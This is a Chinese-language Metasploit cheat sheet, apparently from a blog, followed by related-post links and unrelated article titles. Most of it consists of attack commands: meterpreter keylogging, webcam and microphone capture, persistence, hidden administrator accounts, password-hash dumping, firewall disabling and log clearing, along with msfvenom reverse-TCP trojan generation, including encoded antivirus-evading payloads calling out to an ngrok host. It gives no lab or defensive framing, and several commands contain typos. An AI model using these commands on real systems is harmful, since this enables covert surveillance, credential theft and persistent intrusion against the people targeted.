MSF基本使用
MSF

链接数据库
linux查找文件
find / -name dabase.yml
链接数据库 db_connect -y path/database.yml
db_status 查询数据库链接状态
payload: windows/x64/meterpreter/reverse_tcp 命令 (以下命令基于这个payload)
background 后台
sessions -i 1 返回
sessions -l 列出所有session
getwd 查看远程主机当前路径
getlwd 查看本地当前路径
search -d c:\\ -f *.doc 查找文件
upload 3.jpg c:\\1.jpg 上传文件
cat test.txt 查看文件
download c:\\phpstudy\\wke.doc /root/wke.doc 下载文件
route 查看路由
getpid 查看当前进程ID
execute -H -f calc.exe 执行文件
shell 开启shell
kill杀死进程
sysinfo 列出系统信息
进程迁移
ps 查看所有正在运行的进程
getuid 获取当前进程的用户
migrate 进程号 迁移进程 explorer.exe为桌面进程
开启键盘
keyscan_start 开启键盘记录 (需要有管理员权限)
keyscan_dump 显示记录的信息
keyscan_stop 关闭键盘记录
录制声音
record-mic -d 10 录制声音10秒
开启摄像头
webcam_list 查看摄像头连接
webcam_chat 开启摄像头
webcam_stop 关闭摄像头
webcam_snap开摄像头截屏
webcam_stream -i 1 -v true
桌面截屏
screenshot 截屏
开启VNC
run vnc 开启vnc
持久化访问
run metsvc 安装持久化访问
run metsvc -r 卸载安装
另一种方法
run persistence -X -i 5 -p 445 -r ip
创建 隐藏用户
net user hacker$ hacker /add 创建隐藏用户
net localgroup admininistators hacker$ /add 添加用户到管理员组
用getgui创建用户 并分配管理员权限 开启远程桌面
run getgui -u hacker -p hacker
获取凭证(用户名和密码)
run post/windows/gather/hashdump
判断是否为虚拟机
run post/windows/gather/checkvm
获取目标主机最近的操作
run post/windows/gather/dumplinks
获取系统安装程序个补丁
run post/windows/gather/enum_applications
通过shell关闭防火墙
shell
netsh adcfirewall ser allprofiles srate off
开启端口转发
portfwd add -l 1235 -r 10.10.10.129 -p 3389
这样就把远程主机的端口 映射到本机的1235端口
清除日志
clearev 清除日志
kali链接windows桌面
rdesktop -u admin -p admin ip:port
kali命令行与窗口化切换
init 3 命令行 5桌面
msfvenom生成木马
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.10.128 lport=10001 -f exe > /root/config.exe
免杀木马
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘\x00’ lhost=server.ngrok.cclport=00000 -f c
-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)
木马的使用
设置tcp监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.10.128
ser lport 10001
run
远程主机运行木马
windows命令
net use 查看网络链接
net user admin 123456 /add 添加用户
net user admin 密码
net user admin /del
MSF基本使用的更多相关文章
- 免杀后门之MSF&Veil-Evasion的完美结合
本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装 ...
- 用MSF进行提权
在WEB渗透中当我们拿到webshell了,我们可以试试用MSF(metasploit)来进行提权,在MSF里meterpreter很强大的! 我们先用msfvenom生成一个EXE的木马后门. ms ...
- 现代软件工程 第七章 【MSF】练习与讨论
7.7 移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...
- [书目20160218]微软软件研发的奥秘:MSF精髓
目录 第一部分 解决方案交付基础 第1章 什么是MSF,它适合你吗 2 1.1 MSF的历史和起源 2 1.2 为什么是“框架” 3 1.3 MSF有何不同 5 1.4 MSF第四版的要素 5 1.5 ...
- msf命令全集
一.msfconsole ? 帮助菜单 back 从当前环境返回 banner 显示一个MSF banner cd 切换目录 color 颜色转换 connect 连接一个主机 e ...
- MSF溢出实战教程
1. 进入终端,开启MSF相关服务 2. 连接数据库 3. 主机扫描 发现如果有MS08_067漏洞,就可以继续渗透 4. 开始溢出 溢出成功的话 sessions -l 查看 ...
- MSF命令 收集
一.msfconsole ? 帮助菜单 back 从当前环境返回 banner 显示一个MSF banner cd 切换目录 color 颜色转换 connect 连接一个主机 e ...
- [转]软件开发过程(CMMI/RUP/XP/MSF)是与非?
经常看到和听到大家在争论敏捷过程.RUP和CMM 哪个软件开发过程更好或者哪个过程不好,各自都有理由.争论得不亦乐乎......实际上,没有十全十美的过程,也不存在更好的过程.关键是什么样的过程适合自 ...
- [转]比较 Rational Unified Process (RUP) 和 Microsoft Solutions Framework (MSF)
文档选项 将此页作为电子邮件发送 级别: 初级 Sandra Sergi Santos, 软件工程专家, IBM 2007 年 6 月 15 日 本文来自于 Rational Edge:Micro ...
- BT5之Metasploit[MSF]连接postgresql数据库
1,先查看postgresql的端口,默认是自动开启的,端口7337 . root@bt:~# netstat -tnpl |grep postgres tcp 0 0 1 ...
随机推荐
- 如何从0到1设计一个类Dubbo的RPC框架
之前分享了如何从0到1设计一个MQ消息队列,今天谈谈"如何从0到1设计一个Dubbo的RPC框架",重点考验: 你对RPC框架的底层原理掌握程度. 以及考验你的整体RPC框架系统设 ...
- Java中类变量(静态变量)和类方法(静态方法)
类变量 类变量也叫静态变量或静态属性,是该类所有对象共享的变量任何一个该类的对象去访问它时,取得都是一样的值 语法: 访问修饰符 static 数据类型 变量名 static 访问修饰符 数 ...
- linux 利用python模块实现格式化json
非json格式示例 {"name": "chen2ha", "where": {"country": "Chi ...
- Python中类的多层继承和多重继承
- ASP.NET Core 6框架揭秘实例演示[10]:Options基本编程模式
依赖注入使我们可以将依赖的功能定义成服务,最终以一种松耦合的形式注入消费该功能的组件或者服务中.除了可以采用依赖注入的形式消费承载某种功能的服务,还可以采用相同的方式消费承载配置数据的Options对 ...
- 【C# 集合】Hash哈希函数 |散列函数|摘要算法
希函数定义 哈希函数(英語:Hash function)又称散列函数.散列函数.摘要算法.单向散列函数.散列函数把消息或数据压缩成摘要,使得数据量变小,将数据的格式固定下来.该函数将数据打乱混合,重新 ...
- 【C#程序集】为何.NET Core控制台项目发布后是一个dll文件,而不是exe文件?
因为 .NET Core 的控制台应用默认是生成 dll 文件,而没有对应的 exe 文件.如下图所示,是在VS中编译后生成的结果 图中看到的TestVisualizer.exe 只是一个快捷方式, ...
- Hive数子IP与字符串IP之间的转换
字符串IP:247.164.62.58 对应的 数字IP:4154736186 数子IP=>字符串IP select concat_ws('.',conv(substr(hex(41547 ...
- GNS3与抓包工具Wireshark的关联
转至:https://blog.51cto.com/xpleaf/1615145 (一)前言 本博文分享GNS3与Wireshark关联的方法. 显然现在网络上已经有类似的文章分享,而本博文旨在提供更 ...
- 『无为则无心』Python日志 — 66、将日志信息保存到文件中
目录 1.把日志信息保存到文件中 2.拓展 (1)观察代码 (2)提出问题 (3)问题说明 1.把日志信息保存到文件中 代码如下所示: """ logging模块是Pyt ...